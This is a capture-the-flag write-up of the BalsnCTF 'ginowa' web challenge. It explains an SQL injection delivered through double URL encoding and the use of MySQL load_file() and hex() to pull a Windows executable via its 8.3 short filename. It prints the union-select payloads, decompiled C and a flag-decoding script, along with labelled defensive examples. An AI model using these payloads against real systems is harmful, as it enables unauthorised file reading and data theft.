# *SOME WEB THINGS THAT I LEARNED (part 2)*

#### Recently I learned some new things from some challs that I want to share.

###### This is from a BalsnCTF chall that I recently played.

## ginowa

- The challenge gives us a website that is like Tinder? I guess, idk xD. You can like and dislike, just like Tinder, but for chihuahuas.
- Visiting the site, we can see that when we get switched to another chihuahua, the `id` param in the URL changes. Looks like it is fetching the content based on what is passed in the URL, so potentially SQLi.

![](https://hackmd.io/_uploads/Hk2YSOZbp.png)

- Let's take a look at the source. There are lots of files to read, but I think only 2 of them are important to the exploit. We will look over all of them, but mostly those 2 files.

### 2. The source code

#### Backend:

- **api.php**: This file is one of the 2 files. It is the one doing the SQL. First it sets the `id` param, which is 1 by default. It then connects to MySQL and executes the following query:

![](https://hackmd.io/_uploads/SJ1WPuWZ6.png)

  This query does not go through any sanitization and does not use a `prepared statement`, which makes it vulnerable to `SQLi` (like we said before). It then basically fetches the content based on the id that was passed in.
- **config.php**: This file contains code that defines values for MySQL, like database name, host, user, ... so we can use it to connect to MySQL.
- **info.php**: runs `phpinfo()`, which gives us info about the PHP we are using, like version, environment, server information, ...
- **list.php**: running `sc queryex`, it retrieves and displays information about all services on the Windows system, including details like their status, display name, and other properties.

#### Frontend:

- **config.php**: contains a function which randomizes the next id we get when we "swipe" (like Tinder).
- **info.php**: the code in this file looks for whether the URL has the `?action` param, and then executes based on its value:
  - `?action=frontend`: returns `phpinfo()`
  - `?action=backend`: runs the info.php file in the backend, which, the same, would return `phpinfo()`
  - `?action=backend2`: runs list.php, which would return the services running on Windows.
- **index.php**: the code checks for our `id` param in the URL; if it doesn't exist, by default `id = 1`. Then it checks the status, which is fetched from the database through our SQL; if it equals `ok`, then OK xD. If not, it returns `DB error`. Now the thing is, it is running `file_get_contents`, which returns the content of a file based on the path we provide. It is reading the file through the URL that we enter.

![](https://hackmd.io/_uploads/SJKYjO-Za.png)

  Now we won't be able to send a normal SQLi payload and expect it to work. What we need is a bit of a trick.

### 3. Exploit

- First, SQL injection. Simple: 4 columns, 4 values to pass in. Simple, right? We can just inject something like: `-1' union select 'ok', 'a',1,'a`. The `ok` is the status, `a` is a string and `1` is an int. Simple xD.
- Now the thing is, `file_get_contents` won't see it that way (not like our website). We can try to send the payload and observe what it returns.

![](https://hackmd.io/_uploads/rJwtbYbZa.png)

- The URL is URL-decoded and passed into `file_get_contents`; when the function looks at the URL, it is an invalid format for the URL it tries to access. We need to somehow provide it with a valid URL so that it can read the URL and our SQL gets injected. That's when `double URL encoding` comes in. Giving it a double-encoded URL, it will first be decoded once, then passed into the function, which now would be valid. Let's test it out.

![](https://hackmd.io/_uploads/SJKPHYW-a.png)

- Success! Now the challenge tells us to call the `readflag-[some hex].exe` file to get the flag.
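
An added example (not code from the writeup or the challenge) of the two things above: the `id` param handled the way api.php does it (pasted into the SQL) next to a hardened version with an allow-list and a bound parameter, plus a check that spots the double-URL-encoded form of the payload before it reaches the database. An in-memory sqlite table stands in for MySQL, the table and column names are made up (the writeup only shows that the query returns 4 columns with the status first), and the two decode hops of the real site are collapsed into one.

```python
# Added example, not code from the writeup or the challenge: the `id` parameter
# handled the way api.php does it (pasted into the SQL) next to a hardened
# version, plus a check for the double-URL-encoded form of the payload. An
# in-memory sqlite table stands in for MySQL, and the table/column names are
# made up (the writeup only shows that the query returns 4 columns, status
# first). The two decode hops of the real site are collapsed into one here.
import sqlite3
from urllib.parse import quote, unquote

# constructed stand-in data
SCHEMA = """
CREATE TABLE chihuahua (id INTEGER PRIMARY KEY, status TEXT, name TEXT, pic TEXT);
INSERT INTO chihuahua VALUES (1, 'ok', 'Taco', 'taco.jpg');
INSERT INTO chihuahua VALUES (2, 'ok', 'Bella', 'bella.jpg');
"""

PAYLOAD = "-1' union select 'ok', 'a',1,'a"  # the writeup's injection


def fresh_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def fetch_vulnerable(conn, raw_id):
    # api.php's mistake: the parameter is pasted into the SQL text, so a quote
    # inside it closes the string and the rest becomes part of the query.
    sql = f"SELECT status, name, id, pic FROM chihuahua WHERE id = '{raw_id}'"
    return conn.execute(sql).fetchone()


def fetch_hardened(conn, raw_id):
    # 1) allow-list the shape: an id is a non-negative integer, nothing else;
    # 2) bind it as a parameter so it is sent as data, never as SQL text.
    if not raw_id.isdigit():
        return None
    sql = "SELECT status, name, id, pic FROM chihuahua WHERE id = ?"
    return conn.execute(sql, (int(raw_id),)).fetchone()


def single_encode(s):
    return quote(s, safe="")


def double_encode(s):
    return single_encode(single_encode(s))


def looks_double_encoded(value_from_query_string):
    """True if the value still contains decodable %XX sequences after the one
    decode the web server already performs, i.e. it was encoded twice."""
    once = unquote(value_from_query_string)
    return unquote(once) != once


def index_php(conn, value_from_query_string, hardened):
    """Mimics index.php's answer: PHP decodes the query-string value once,
    api.php runs the query, the page prints 'ok' or 'DB error'. The hardened
    path refuses double-encoded input before it reaches the database."""
    if hardened and looks_double_encoded(value_from_query_string):
        return "rejected"
    decoded = unquote(value_from_query_string)
    fetch = fetch_hardened if hardened else fetch_vulnerable
    row = fetch(conn, decoded)
    return "ok" if row and row[0] == "ok" else "DB error"


if __name__ == "__main__":
    db = fresh_db()
    print("vulnerable, payload:", fetch_vulnerable(db, PAYLOAD))
    print("hardened,   payload:", fetch_hardened(db, PAYLOAD))
    print("double-encoded flagged:", looks_double_encoded(double_encode(PAYLOAD)))
```

The bound parameter alone already stops the injection; the `isdigit()` allow-list is there so that a non-numeric id is refused before any query runs, which is also the cheapest place to log the attempt. The double-encoding check works because a legitimate id never contains `%XX` after the server's own decode, so anything that still decodes further was encoded on purpose.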
- This is impossible, since SQL doesn't have any command we can use to execute an executable file. But maybe we can do it locally?
- After a bit of searching for *`how to read file in MySQL`*, I found that MySQL has a function **`load_file`**, which returns the content of a file as a string. Nice! We can use it to grab the exe file and run it locally. But ... what about the filename? We don't know the hex value.
- Googling the entire morning returned me nothing; I can't find any way to get a hidden filename from a directory. Returning to the source code and the challenge, I see that the file is in `C:/` and the web is running `sc queryex`. Searching about it gives me some information that the chall is running on Windows.

![](https://hackmd.io/_uploads/H1QzDtbW6.png)

- So ... is there a vulnerability about files, especially filenames, on Windows? Yes! There is this one that stands out:

![](https://hackmd.io/_uploads/BJODDtWZT.png)

  You can read about it here for a better explanation: https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/
- Reading about it, the short filename keeps only the first 6 characters of the name, so we can abuse that by reading the `readfl~1.exe` file. Payload: `-1' union select 'ok', (load_file('C:/readfl~1.exe')),1,'a`. But sending it gives me this:

![](https://hackmd.io/_uploads/r1wwhtbZ6.png)

- Of course, since it's an exe file, it is binary and we need to encode it in order to read it. So what now? Looking around again, I found that SQL has something called `hex()`, which returns the hex of whatever input it is given. Using that, I was able to get the full hex:

![](https://hackmd.io/_uploads/H1tHTFbbT.png)

- Nice! Now go onto CyberChef, decode from hex, then download the exe file. From here I basically don't know what to do, since it involves an exe => Rev, to be clear. So I asked my friend ***`n1w`*** to help me reverse this.
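
Before the reversing part, a quick aside on the short-name behaviour used above, as an added example that is not part of the original writeup: a small audit that predicts the 8.3 alias Windows generates for each file in a directory listing. It shows why a random suffix in a long filename (like `readflag-[some hex].exe`) does not hide the file on a volume where 8.3 name generation is on. The generation rules are a simplified version of NTFS's documented behaviour (an assumption of this example), the sample listing is constructed, and the hex suffixes in it are placeholders.

```python
# Added example, not from the writeup: an audit that predicts the 8.3 short
# alias Windows would generate for each file in a directory, to show why a
# random suffix in a long filename (readflag-<hex>.exe above) does not hide the
# file on a volume with 8.3 name generation enabled. The generation rules below
# are a simplified version of NTFS's documented behaviour (an assumption of
# this example), and the sample listing is constructed.
import re

# characters that cannot appear in an 8.3 name (whitespace is dropped,
# the others are replaced with "_")
DROPPED = re.compile(r"\s")
REPLACED = re.compile(r"[+,;=\[\]]")
HASHED = "<hash-based alias, not predicted by this simplified model>"


def fits_8_3(name):
    """True if `name` already is a legal 8.3 name and needs no alias."""
    upper = name.upper()
    if DROPPED.search(upper) or REPLACED.search(upper) or upper.count(".") > 1:
        return False
    base, _, ext = upper.partition(".")
    return 1 <= len(base) <= 8 and len(ext) <= 3


def short_name(long_name, taken):
    """Predict the alias for `long_name`, given aliases already `taken` in the
    same directory; None when no alias is generated."""
    if fits_8_3(long_name):
        return None
    cleaned = REPLACED.sub("_", DROPPED.sub("", long_name.upper()))
    base, dot, ext = cleaned.rpartition(".")
    if not dot:                      # no extension at all
        base, ext = cleaned, ""
    base = base.replace(".", "")     # only the last period survives
    stem, ext = base[:6], ext[:3]    # first 6 chars of the name, 3 of the ext
    for n in range(1, 5):            # ~1 .. ~4, then NTFS switches to a hash
        candidate = f"{stem}~{n}" + (f".{ext}" if ext else "")
        if candidate not in taken:
            return candidate
    return HASHED


def audit_directory(filenames):
    """Map each long name in a listing to the alias it is also reachable by."""
    taken, report = set(), {}
    for name in filenames:
        alias = short_name(name, taken)
        if alias and alias != HASHED:
            taken.add(alias)
        report[name] = alias
    return report


if __name__ == "__main__":
    # constructed listing; the hex suffixes are placeholders, not the real one
    listing = ["readflag-0123abcd.exe", "readflag-89efcafe.exe", "s",
               "api.php", "Program Files", "a.b.c.txt"]
    for name, alias in audit_directory(listing).items():
        print(f"{name:25} -> {alias}")
```

Anything the audit maps to an alias is addressable by that alias as well, so a "secret" filename is no secret. The fix on the Windows side is to turn short-name generation off (`fsutil 8dot3name query` shows the current setting, `fsutil 8dot3name set 1` disables it) and to strip the aliases that already exist with `fsutil 8dot3name strip`, since disabling generation does not remove them.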
```c
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char Str[28]; // [rsp+20h] [rbp-60h] BYREF
  int v5; // [rsp+3Ch] [rbp-44h]
  __int64 v6; // [rsp+40h] [rbp-40h]
  __int64 v7; // [rsp+48h] [rbp-38h]
  __int64 v8; // [rsp+50h] [rbp-30h]
  __int64 v9; // [rsp+58h] [rbp-28h]
  __int64 v10; // [rsp+60h] [rbp-20h]
  __int64 v11; // [rsp+68h] [rbp-18h]
  __int64 v12; // [rsp+70h] [rbp-10h]
  __int64 v13; // [rsp+78h] [rbp-8h]
  int v14; // [rsp+80h] [rbp+0h]
  char Buffer[104]; // [rsp+90h] [rbp+10h] BYREF
  FILE *Stream; // [rsp+F8h] [rbp+78h]

  _main();
  strcpy(Str, "agyrutgreugweoffeihrefkeowf");
  v5 = 0;
  v6 = 0i64;
  v7 = 0i64;
  v8 = 0i64;
  v9 = 0i64;
  v10 = 0i64;
  v11 = 0i64;
  v12 = 0i64;
  v13 = 0i64;
  v14 = 0;
  Stream = fopen("s", "r");
  if ( Stream )
  {
    if ( fgets(Buffer, 100, Stream) )
    {
      Buffer[strcspn(Buffer, "\n")] = 0;
      Str[strcspn(Str, "\n")] = 0;
      decrypt(Buffer, Str);
      text_49("%s", Buffer);
      return 0;
    }
    else
    {
      perror("Error reading input");
      fclose(Stream);
      return 1;
    }
  }
  else
  {
    perror("Error opening files");
    return 1;
  }
}
```

- So basically the exe file takes in data from a file called `s`? It then takes the content of the `s` file, uses `agyrutgreugweoffeihrefkeowf` as the key to decrypt it and returns us the flag. So ... SQLi to get the `s` file. The file should be in the same folder.

![](https://hackmd.io/_uploads/HyudyqWba.png)

- Now take the exe file and the `s` file, put them in one folder and run the exe file. Or, as my friend decided, just code it out.

```py
from pwn import process

# hex dump of the s file, pulled out of the database with hex()
hex_string = "232635213B0F0D27500138433A5A0B520905371F3C5352293003345024120F"
char_array = bytes.fromhex(hex_string)

# write it back as the s file the exe expects, next to the exe
with open('s', 'wb') as f:
    f.write(char_array)

# run the exe and read the decrypted flag it prints
io = process('./test1.exe')
print(io.recv())
```

**Flag: BALSN{jU5t_4_5m4ll_mY59L_tR1Ck}**

### What I learned:

- Windows has a filename vulnerability (I just learned about it today xD).
- New functions in SQL that we can use to read files: `load_file()` and `hex()`.

## Thank you for reading >.< Gud bye

![](https://hackmd.io/_uploads/rJjmZ9--6.jpg)